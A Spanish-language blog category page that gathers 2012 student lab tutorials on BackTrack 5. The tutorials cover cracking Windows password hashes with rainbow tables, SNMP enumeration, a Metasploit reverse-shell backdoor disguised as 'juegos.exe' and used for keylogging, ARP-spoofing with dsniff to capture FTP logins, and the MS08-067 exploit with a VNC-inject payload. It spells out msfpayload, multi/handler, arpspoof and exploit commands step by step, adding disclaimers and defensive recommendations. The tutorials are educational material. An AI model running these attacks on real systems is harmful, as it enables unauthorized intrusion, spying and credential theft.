Category: BackTrack 5


Password Craking con Rainbow Tables S7k

octubre 16, 2012

Password Craking con Rainbow Tables

“Tengo el Hashes de la contraseña. ¿Cómo puedo obtener la contraseña original?”
Hash es una función que se aplica a un archivo de cualquier tipo, ya sea documentos, fotos, música,… y de la cual se obtiene una clave que representa de manera única a ese archivo.
Tablas de arco iris o Rainbow Tables son las tablas de búsqueda que contienen casi todas las combinaciones posibles de contraseñas en un conjunto de caracteres dado. Se trata simplemente de un ataque de fuerza bruta terminado que se puede reutilizar tantas veces como desee sin tener que regenerar todas esas posibles combinaciones de contraseñas. Esto puede reducir el tiempo de descifrado de contraseñas hasta en un 99%! Por supuesto, para generar una tabla de arco iris que puede tomar más tiempo que se necesitaría para romper una contraseña, vamos a ver exactamente cómo funcionan.
Las funciones Hash más importantes son:

SHA
MD5
LM
NTLM
Prueba Password Craking con Rainbow Tables en Windows 7
1) Para obtener acceso a esta versión de sistema operativo, se me ocurre que podemos aprovecharnos de una vulnerabilidad en Internet Explorer, ejecutaremos los siguientes comandos en nuestro Backtrack 5.

2.-  En la máquina con Windows 7, se debe abrir la URL generada por Metasploit  con Internet Explorer y se abrirá nuestra primera sesión Meterpreter, se puede enmascarar la URL con algún servicio tipo Shorturl.

3.- Elevamos privilegios tipo “System” y obtenemos la SAM con el listado de usuarios y contraseñas.

•    Todos los LM Hash en Windows 7 son iguales, ¿lo notaron? lo que ocurre es que ya no se usa LM Hash en Windows 7
Lo que si cambia son los NTLM Hash y esto es más complejo para obtener las contraseñas debido a que no tiene todas las vulnerabilidades de LM Hash
4.- ¿Entonces como hacemos para poder auditar las contraseñas que trabajan con NTLM Hash?
•    Usamos Rainbow Tables especialmente diseñadas para NTLM, las mismas se pueden descargar desde aquí: http://ophcrack.sourceforge.net/tables.php

En la imagen superior podemos observar como se obtuvo las contraseñas más débiles para para ciertos usuarios, las contraseñas que no se pudieron obtener se deben a que tienen una contraseña compleja que requiere de Rainbow Tables más grandes.
Conclusiones y recomendaciones para prevenir esto:

o    Desactivar los hashes LM en Windows, de la siguiente manera:


o    NTLM usa un algoritmo de hash mucho más potente que LM Hash, por lo que obtener la contraseña es más complejo.
o    Utiliza siempre contraseñas complejas, de más de 8 o 9 caracteres y que contengan mayúsculas, con esto evitarás que tu contraseña pueda ser expuesta.
o    Las Rainbow Tables siguen siendo la mejor opción para obtener las contraseñas de NTLM Hash, sin embargo, se requieren de Rainbow Tables muy grandes para poder tener éxito
o    Finalmente, se recomienda que para auditar la robustez de las contraseñas, se usen los 02 métodos descritos arriba: Rainbow Tables y el análisis ONLINE.

Integrantes:
Andres Macancela
Gabriela Monroy
Danny Figueroa
Gerardo Fienco
Jesus Banchen

Share this:

ENUMERACIÓN SNMP

October 16, 2012
SNMP ENUMERACIÓN La enumeración tiene lugar después de la digitalización y el proceso de recopilación y compilación de nombres de usuario, nombres de equipos, recursos de la red, acciones y servicios. También se refiere a la consulta activa o la conexión a un sistema de destino para obtener esta información.
Enumeración SNMP es el proceso de utilizar SNMP para enumerar cuentas de usuario en un sistema destino. SNMP utiliza dos tipos principales de componentes de software para la comunicación: el agente SNMP, que se encuentra en el dispositivo de red, y la estación de administración SNMP, que comunica con el agente. Análisis de Vulnerabilidades es el proceso de identificación proactiva de las vulnerabilidades de los sistemas informáticos en una red. Por lo general, un escáner de vulnerabilidades primero identifica el sistema operativo y el número de versión, incluyendo paquetes de servicio que puedan estar instalados. Extracción de nombres de usuario con la enumeración. Reunir información sobre el uso de acogida sesiones
nulas. Realizar la enumeración de Windows. Adquirir las cuentas de usuario.
COMENZAREMOS CON EL ATAQUE. USAREMOS 2 MAQUINAS EN ESTE CASO XP Y BACKTRACK5
LAS MAQUINAS DEBEN ESTAR EN RED
EN WINDOWS XP ES INDISPENSABLE TENER HABILITADO SNMP  PARA PODER USAR EL ATAQUE PARA ESO
1.- NOS VAMOS A AGREGAR PROGRAMAS
2.-DAMOS CLICK EN ADD/REMOVE WINDOWS COMPONENTS
3.-DAMOS CLICK EN MANAGEMENT AND MONITORING  TOOLS Y LUEGO DETAILS
4.-VERIFICAMOS QUE SNMP ESTA INSTALADO SINO LO DEBEMOS INSTALARLO CON EL CD XP
 5.- EN EL CASO QUE NO TENGAMOS INSTALADO DEBEMOS INSTALARLO
6.- DEBEMOS CONOCER LA IP DE LA MAQUINA USAMOS IPCONFIG EN XP  
  7.- TAMBIEN DEBEMOS SABER LA IP DE BACKTRACK5 R2 ABRIMOS UN TERMINAL Y USAMOS EL COMANDO  IFCONFIG PARA OBTERNER LA IP DEL BACKTRACK5
  8.- LUEGO VERFICAMOS QUE ESTE CONECTADO PARA ESTO NOS VAMOS :
  1.-APPLICATIONS
2.-INTERNET
3.-WICD NETWORK MANAGER SE ABRIRÁ UNA VENTANA IGUAL A ESTE GRAFICO
  9.- LUEGO HACEMOS PING ENTRE LAS DOS MÁQUINAS
  UNA VEZ VERIFICADO QUE ESTAS MAQUINAS SE VEN, PROCEDEREMOS CON EL ATAQUE. DESDE BACKTRACK USAMOS SNMPENUM ESTO LO ENCONTRAMOS EN:
1.- APLLICATIONS
2.- BACKTRACK
3.- INFORMATION GATHERING
4.- NETWORK ANALYSIS
5.- SNMP ANALYSIS
6.- snmpenum
Nos mostrara un terminal igual a este gráfico
Dentro de este terminal escribiremos el siguiente comando: ./snmpenum.pl (ingresamos la ip de la máquina que vamos a atacar) public Windows.txt
Damos enter y recibiremos toda la información de la maquina a la cual estamos atacando.
 
 
 
vídeo demostrativo del ataque:
Grupo # 2       S7K
Integrante:
Daniel Carbo Yanangomez          @Daniel_carbo
Ruth Yagual Montoya                @Ruth_ym
Carlos Briones Peña                   @carlosbriones26
Patricia Cruz    Reyes                  @patty_lisbeth

rvirginia89's Blog

SNMP ENUMERACIÓN

La enumeración tiene lugar después de la digitalización y el proceso de recopilación y compilación de nombres de usuario, nombres de equipos, recursos de la red, acciones y servicios. También se refiere a la consulta activa o la conexión a un sistema de destino para obtener esta información.

Enumeración SNMP es el proceso de utilizar SNMP para enumerar cuentas de usuario en un sistema destino. SNMP utiliza dos tipos principales de componentes de software para la comunicación: el agente SNMP, que se encuentra en el dispositivo de red, y la estación de administración SNMP, que comunica con el agente.

Análisis de Vulnerabilidades es el proceso de identificación proactiva de las vulnerabilidades de los sistemas informáticos en una red. Por lo general, un escáner de vulnerabilidades primero identifica el sistema operativo y el número de versión, incluyendo paquetes de servicio que puedan estar instalados.

Extracción de nombres de usuario…

Ver la entrada original 295 palabras más

ATAQUE BACKDOOR

Aclaración:

El Siguiente ataque tiene fines académicos, no nos responsabilizamos del uso que se le dé a ésta información. Nuestro propósito es dar a conocer esta técnica para que usted se proteja de ataques similares.

Ataque BackDoor (Puerta Trasera)

Introducción:

¿Qué es Backdoor (Puerta Trasera)?

Es una secuencia especial dentro del código de programación, mediante la cual se pueden evitar los sistemas de seguridad del algoritmo (autentificación) para acceder al sistema. Aunque estas puertas pueden ser utilizadas para fines maliciosos y espionaje no siempre son un error, pueden haber sido diseñadas con la intención de tener una entrada secreta.

  • El Ataque Backdoor consiste en que un atacante remoto logra acceso ilegal a la máquina de un usuario y, eventualmente, puede tomar el control completo de la misma. Con sus puertas abiertas de par en par, la máquina afectada es el lugar perfecto para la recolección de datos sensibles.

Características:

  • Son invisibles por el usuario.
  • Se ejecutan en modo silencioso al iniciar el sistema.
  • Pueden tener acceso total a las funciones del  host-víctima.
  • Difícil eliminarlos del sistema ya que se instalan en carpetas de sistema, registros o cualquier dirección.
  • Usa un programa blinder para configurar y disfrazar al servidor para que la víctima no lo detecte fácilmente.

¿Qué se puede hacer con ataque Backdoor?

  • Ejecutar aplicaciones (instalaciones de programas, anular procesos, etc.).
  • Modificar parámetros de configuración del sistema.
  • Extraer y enviar información (archivos, datos, etc.) al host-victima.
  • Substraer o cambiar los password o archivos de password.
  • Mostrar mensajes en la pantalla.
  • Manipular el hardware de la host-víctima.
  • Acceso total a las funciones de la PC.

Objetivos del Ataque Backdoor:

Eludir los procedimientos habituales de autenticación al conectarse a una computadora. Instalándose una puerta trasera para permitir un acceso remoto más fácil.

Lograr una gran cantidad de computadoras infectadas para disponer de ellos libremente hasta el punto de formas redes de Zombies.

Diagrama del Ataque:

Usamos como Víctima:

Windows Xp SP3:

IP 192.168.94.132  NM 2555.255.255.0

Backtrack 5:

IP 192.168.94.133  NM 2555.255.255.0

Alcance:

“Cualquier medio capaz de ampliar el alcance del hombre es lo suficientemente poderoso como para derrocar su mundo. Conseguir que la magia de ese medio trabaje para los fines de uno, antes que en contra de ellos, es alcanzar el conocimiento.”  por Alan Kay

Por medio de este ataque nos referimos a una forma “no oficial” de acceso a un sistema o a un programa.

Estos programas no se reproducen solos como los virus, sino que usualmente nos son enviados con el fin de tener acceso a nuestros equipos a través del correo electrónico, por lo que no son fáciles de detectar y por si solos no siempre causan daños ni efectos inmediatos por su sola presencia, por lo que pueden llegar a permanecer activos mucho tiempo sin que nos percatemos de ello.

Como todo en Internet se basa en la arquitectura cliente/servidor, sólo se necesita instalar un programa servidor en una máquina para poder controlarla a distancia desde otro equipo, si se cuenta con el cliente adecuado, ésta puede bien ser la computadora de un usuario descuidado o poco informado.

Glosario:

  • SUDO.- permite a los usuarios ejecutar programas con los privilegios de seguridad de otro usuario (normalmente el usuario root) de manera segura. Se instala por defecto en /usr/bin.
  • MSFPAYLOAD.- línea de comandos de Metasploit que se utiliza para generar y dar salida a todos los diversos tipos de shellcode que están disponibles en Metasploit.
  • MSFCONSOLE.- Es un intérprete de comandos para realizar las pruebas sus penetración.
  • EXPLOIT.- Es un programa que explota una o varias vulnerabilidades en un software dado, frecuentemente es utilizado para ganar acceso a un sistema y tener un nivel de control sobre él.
  • PAYLOAD.- Es un programa que acompaña a un exploit para realizar funciones especificas una vez el sistema objetivo es comprometido, la elección de un buen payload es una decisión muy importante a la hora de aprovechar y mantener el nivel de acceso obtenido a un sistema, principalmente por el hecho de que en muchos sistemas existen firewalls, Antivirus y sistemas de detección de intrusos que pueden dificultar la actividad de algunos payloads.
  • SCREENSHOT.- Para capturar los elementos vistos en el monitor u otro dispositivo de salida visual.
  • KEYSCAN_START.- Para capturar los elementos que la victima teclee.
  • KEYSCAN_DUMP.- Para mostrar los elementos que fueron capturados.

Tutorial:

1. Instalar BackTrack 5

2. Ingresar con Usuario: root y Contraseña: toor. Para poner en modo gráfico tipear el: start x

3. Abrir Terminal

4. Modificar la dirección IP de nuestra máquina con el siguiente comando: sudo nano etc/network/interfaces

5. Se debe setear de manera estática : auto eth0 inet static. Nuestra IP debe ser parecida a la de la máquina Victima.

6. Crear el archivo ejecutable en nuestro caso se llamará juegos.exe:

msfpayload Windows/meterpreter/reverse_tcp LHOST= 192.168.94.133 LPORT=4444 X > juegos.exe

Luego se nos indica que el archivo ha sido creado.

Y a continuación lo podemos visualizar en Places/Home Folder:

Nota: Este archivo ejecutable lo podemos hacer llegar a la víctima, mediante ingeniería social, u otros medios como dispositivos de almacenamiento.

7. Para ir a la consola de MetaExploit usar el siguiente comando: msfconsole

Con esto se cargarán todas las herramientas para el ataque.

8. Para poder ejecutar los archivos que hemos enviado usar: use exploit/multi/handler

9. Ahora para encontrar vulnerabilidades de los puertos de la victima escribir:

set PAYLOAD Windows/meterpreter/reverse_tcp

Y setear nuestra IP y PUERTO

10. Necesitamos saber si todo lo hecho está correcto para ello utilizamos el comando: show options

11. Usar el siguiente comando: exploit.

Debemos esperar hasta cuando la víctima haya ejecutado el archivo.

12. En este caso por motivos académicos lo pasamos vía USB y lo ejecutamos en nuestra máquina Víctima.

13. Una vez que la victima haya ejecutado nos indicará que una sesión ha sido iniciada:

Ahora que ya tenemos Acceso a nuestra Victima podemos realizar los ataques.

14. Para capturar la pantalla de la victima usamos: screenshot /img.jpg

15. Otro ataque es saber todo lo que la victima teclee, para ello utlizamos el comando: keyscan_start, para inicializarlo. Y keyscan_dump para ver todo lo tecleado.

La victima escribe, y nos aparecerá en el terminal.

16. También podemos ver todos los directorios que tiene nuestra victima con el comando: ls

Podemos crear carpetas en la máquina victima por ejemplo: mkdir (nombre_de_carpeta)

17. Podemos ver los procesos que tiene activos por ejemplo: en Windows Xp (nuestra víctima) abrimos Internet Explorer.

Luego en el terminal (BackTrack) con el comando ps –aux (para ver los procesos)

Y con el comando Kill y el número de proceso, le matamos el proceso, en este caso: kill 1272

18. Finalmente un último ataque reiniciamos la máquina de la víctima con el comando: reboot

A continuación el vídeo

Recomendaciones:

  • Tener siempre el software actualizado pues así se instalan los parches de seguridad del sistema.
  • Procura no usar claves con nombres obvios asociados a los usuarios, preferible usa contraseñas de alta seguridad para evitar los ataques de diccionario.
  • Usa estricta política de manejo y control de los usuarios en carpetas compartidas.
  • Utilizar cuentas de usuario con privilegios limitados
  • Procura no instalar programas de dudosa procedencia ya sean estás descargas de internet, correos y medios extraíbles.
  • Configurar las zonas de internet Explorer y el filtrado de URL.
  • Activa el firewall (Filtrado y protección de las comunicaciones).
  • Evitar ejecutar programas de los que no sepamos su procedencia, tanto en anexos de correo, ICQ, messanger y descargas de Internet (ya sean vía Web o FTP).

Conclusiones:

  • Como reflexión sobre este tipo de ataque es que debemos tomar ciertas medidas básicas para estar a salvo de las puertas traseras y el delicado riesgo para la seguridad que estas representan.
  • Al realizar nosotros este tipo de ataque logramos darnos cuenta como tan fácilmente las personas caen sin saber que esto les puede causar riesgos en su computadoras, el cual por medio de esta experiencia adquirida sabemos como estar alertas y protegidos sobre este ataque.

Integrantes:

  • Vicky Bravo Romero
  • Vicente Cabrera Martínez
  • Jhonatan Ortega Veloz
  • Xiomara Torres Ruíz
  • Darwin Vargas

Siguenos en Twitter:

@VickyBravoRo  @VicEmys  @JH_1805  @XiomyAndrea22  @7Vargas15

Sanduchito

ACLARACIÓN:

El siguiente ataque tiene únicamente fines académicos, no nos hacemos responsables por la visualización, gestión o manipulación del material presentado en esta web o de su uso.

INTRODUCCIÓN:

Man in the middle (MitM) básicamente es un ataque en el protocolo ARP. Normalmente cuando las computadoras se comunican a través de una red de trabajo un solicitante envía una solicitud ARP para preguntar cuál de los equipos posee una dirección IP en particular. Este requerimiento es enviado a todos en la red y solo uno de los equipos envía una respuesta diciendo ser el dueño de esa IP. En resumidas cuentas el atacante dice ser el dueño. El problema se da porque el protocolo ARP no incorpora una funcionabilidad que le permita saber si el equipo que respondió realmente sea el dueño de esa dirección IP, adicionalmente no hay una regla en el protocolo ARP que diga que los equipos tengan que esperar una solicitud para enviar una respuesta.

OBJETIVO:

El objetivo de este tipo de ataque es obtener la capacidad de observar e interceptar mensajes entre dos víctimas, algo muy fácil de realizar si no se poseen sistemas criptográficos seguros en la red.

Este tipo de ataques puede afectar a todos las máquinas (incluyendo a los servidores) de nuestra red sea LAN o WAN ya sea en una casa o una empresa.

En el artículo vamos a traerles paso a paso y con imágenes cómo funciona este ataque, además al final se presenta un pequeño video para que les quede completamente claro, empecemos.

GLOSARIO:

De los términos que les mostramos a continuación pueden tener más información si hacen clic en el nombre de cada uno.

  • ArpSpoof: Herramienta que nos permite hacer un “envenenamieto del caché” de las tablas ARP, esto permite redireccionar paquetes hacia otro equipo
  • Cliente FTP: Programa que nos permite conectarnos a un servidor FTP a través del protocolo FTP para realizar transferencias de archivos.
  • DHCP: es un protocolo de red que les permite a los clientes de una red obtener parámetros de configuración de forma automática
  • DSniff: Son un conjunto de herramientas para el rastreo de claves y para el análisis de tráfico
  • IP Forwarding: Este mecanismo se encarga de la retransmisión de paquetes que se reciben en una interfaz física hacia otro nodo en la red.
  • Consola de Windows: es un intérprete de comandos, podemos acceder a ella a través del botón INICIO -> ejecutar -> escribimos “cmd” sin las comillas y luego presionamos el botón aceptar.
  • Consola de Linux: es una forma de acceder al sistema sin interfaz gráfica, en Linux la ubicación de su acceso directo es variada, pero la podemos encontrar directamente en el escritorio o el menú de herramientas del sistema como “Terminal”.
  • Servidor FTP: un programa que nos permite el intercambio de datos entre el servidor y un ordenador.
  • Tablas ARP: es una tabla que contiene la vinculación entre una dirección física (MAC) de la tarjeta de red y una IP de la red.
  • Prompt: cuando tenemos el prompt visible es porque tenemos la oportunidad de ingresar comandos en la consola o terminal.

COMO FUNCIONA EL ATAQUE:

En este ataque didáctico vamos a obtener el usuario y clave de autentificación en un servidor FTP para lo cual necesitaremos:

  1. Un servidor FTP
  2. Un cliente FTP
  3. Un equipo que sea el atacante

La pequeña red de ejemplo normalmente funciona de la siguiente manera (antes del ataque):

antes del ataque

Como atacantes vamos a entrar de la siguiente manera desviando el tráfico de la red:

durante el ataque

Como funcionará:

  1. El cliente FTP (usaremos el cliente de FileZilla) se autentifica en un servidor vía FTP (usaremos el servidor de Filezilla).
  2. Con Arpspoof haremos que el cliente crea que el atacante es el servidor y viceversa.
  3. En el atacante activamos el reenvío de IP (IP forwarding) para poder retransmitir los paquetes entre las víctimas.
  4. Con DSniff obtenemos las credenciales que están en los paquetes.

EL ATAQUE:

Nosotros vamos a usar una distribución de Linux, Backtrack 5 para el ataque, la cual debemos configurar correctamente:

  1. Confirmamos que la interfaz de red que vamos a usar se encuentra activa.
    verifica interfaces
  2. En este caso no se encuentra activa, por lo cual debemos activarla (levantarla).
    levantar interfazlisto interfaces
  3. Reiniciamos el servicio de red (en caso de querer dirección IP por DHCP).
    reinicio interfaces
  4. Si en la red hay un servidor DHCP, nos proporcionará una dirección IP, caso contrario le asignamos una IP.
    asigno IP

Para la siguiente parte del ataque necesitamos saber las direcciones IP, si tenemos a las máquinas cerca podemos hacer lo siguiente.

  1. Como las máquinas víctimas son Windows ejecutamos “ipconfig /all” en la consola para verificar sus IP.
    ip servidor
    ip cliente
  2. Confirmamos que las víctimas se puedan comunicar entre ellas antes del ataque usando el comando ping de la siguiente manera “ping –t <dirección IP>” desde cliente hacia el servidor y viceversa.
    pines entre servidor y cliente

Regresamos al Backtrack para comenzar con el ataque. Abrimos 3 terminales para realizar desde la primera arpspoof del cliente hacia el servidor, en la segunda arpspoof del servidor al cliente y la tercera para activar el reenvio de paquete en Linux.

  1. Ejecutamos arpspoof del servidor al cliente, no hay que cerrar este terminal.
    arpspoof servidor cliente
  2. Ejecutamos arpspoof del cliente al servidor, tampoco debemos cerrar este terminal.
    arpspoof cliente servidor
  3. Activamos el reenvio de paquete en Linux, si no se dan problemas solo nos mostrará el prompt.
    reenvio paquetes
  4. En la tercera terminal ejecutamos el comando dsniff para escuchar los paquetes que pasen por el atacante.
    dsniff

Ahora lo falta es que el cliente realice una autentificación en el servidor.

  1. Accedemos desde el cliente FTP al servidor
  2. En este caso el servidor nos muestra que se realizo la conexión.
    acceso al servidor
  3. Nos desconectamos del servidor.
    me desconecto del servidor

Ahora “mágicamente” aparece el usuario y clave en nuestro termina

usuario y clave

VIDEO EXPLICATIVO:

A veces un video (en HD y pantalla completa) vale más que mil palabras asi que…

RECOMENDACIONES Y CONCLUSIÓN:

Este es uno de los ataque más peligrosos que podemos tener en nuestra red ya que se puede capturar información confidencial que obviamente es muy importante.

Es un error por parte de los administradores la seguridad en la empresas pensar que poner un password fuerte es la solución. En casos como el que acabamos de mostrar se puede obtener una clave compleja de 20 caracteres que pueden incluir letras, números y caracteres especiales. La verdadera seguridad está en la implementación de protocolos de seguridad como SSL y un monitoreo constante del tráfico en la red.

Como medidas de defensa adicionales contra este tipo de ataques tenemos:

  • Infraestructura de claves públicas.
  • Descargar la última versión de los navegadores web.
  • Un segundo canal de verificación (seguro).

INTEGRANTES:

Ángel González Vera                        twitter: @angelgonzalezv6
Kevin Baque Carrasco                     twitter: @kevinbaque_c
Edison Navarro Briones                 twitter: @johed_nb
Carlos Medina Bravo                       twitter: @camb125
Diego Rodríguez Camacho            twitter: @dierocam

ATAQUE METASPLOIT VNCINJECT

Introducción:

Es un tipo de ataque de autentificación remota, lo que significa que permite conectarnos remotamente a algún equipo sin tener los permisos necesarios, esto claro si el sistema operativo posee aquellas vulnerabilidades, como por ejemplo sistemas Windows desactualizados.

Objetivo:

Violar la seguridad de un Sistema Windows conectándonos remotamente a este sin tener los permisos necesarios. Para nuestro ejemplo sera un Windows Server 2003, en ejercicios de pruebas también pudimos atacar de la misma manera a Windows XP.

Herramientas a utilizar:

-BackTrack

-Windows Server 2003

Configuraciones de los equipos:

(Estas direcciones han sido utilizadas para nuestro ejemplo, lo importante para el ataque es que las maquinas se encuentren conectadas en la misma red)

– BackTrack

IP: 192.168.1.5

– Windows Server 2003

IP: 192.168.1.6

Revisión de las configuraciones antes de realizar el ataque:

Nos aseguramos de comprobar las Ips de nuestros equipos.

En BackTrack para conocer nuestra Ip abrimos un terminal y usamos el comando ifconfig

En Windows para conocer nuestra Ip abrimos una consola de cmd y usamos el comando ipconfig

Para verificar que hay conexión entre ambos equipos procedemos a realizar un ping, tanto como desde backtrack a windows como de windows a bactrack.

Para casos ya reales en los que no siempre tendremos acceso a la ip de nuestra victima podemos usar el comando nmap en backtrack, permitiendonos asi explorar la red, ver las maquinas conectadas, sus ips y que sistemas operativos poseen.

Procedimiento para realizar el ataque:

Ya previas revisiones de las direcciones y teniendo en claro lo que vamos a realizar, procedemos a seguir los siguientes pasos:

1) Abrimos un terminal desde BackTrack y usamos el comando msfconsole (este comando abre la interfaz MSF -> Metasploit Framework) y esperamos a que cargue la pantalla de bienvenida a la interfaz.

2) Usamos el comando show exploits (nos muestra las lista de los tipos de ataque disponibles), el comando es simplemente utilizado para recordar que tipo de ataque era el que vamos a usar. Ya que en nuestro caso el tipo de ataque es: windows/smb/ms08_067_netapi

Este paso puede ser omitido si se tiene claro que el tipo de ataque es: windows/smb/ms08_067_netapi

3) Usamos el comando use <tipo_de_ataque>

En nuestro caso seria:  use windows/smb/ms08_067_netapi 

4) Procedemos a setear (configuramos los parametros necesarios para realizar el ataque).

4.1) Seteamos el RHOST (Remote Host, que viene a ser la ip de nuestra victima).

El comando a utilizar es set RHOST <ip_victima>

Para nuestro ejemplo seria set RHOST 192.168.1.6

4.2) Seteamos el LHOST (Local Host, que viene a ser la ip de donde estamos realizando el ataque).

El comando a utilizar es set LHOST <ip_atacante>

Para nuestro ejemplo seria set LHOST 192.168.1.5

4.3) Mostramos los payloads (son los métodos del tipo de ataque seleccionado). Esto lo hacemos si no tenemos claro que payload setear. Pero para nuestro ejemplo sabemos que es: windows/vncinject/reverse_tcp

Entonces procedemos a usar el comando: set payload <metodo_ataque>

Para nuestro ejemplo seria: set payload windows/vncinject/reverse_tcp

5) Una vez configurados los parametros, procedemos a ejecutar el ataque con el comando: exploit

6) Finalmente se abre una interfaz donde podemos ver el escritorio de nuestra victima, hemos tomado el control mediante acceso remoto.

Recomendaciones:

Se recomienda tener todos los parches instalados de Windows XP, o de cualquier Sistema Operativo, así se disminuyen las vulnerabilidades.

Se recomienda actualizar constantemente el Sistema Operativo, para disminuir la vulnerabilidades del mismo.

Se recomienda usar software legal, si las licencias son muy caras, siempre se puede optar por el software libre.

Integrantes:

  • Anthony Filian Vivanco
  • Paul Padilla Sabando
  • Josue Cevallos Bayas
  • Christian Chamba Mendez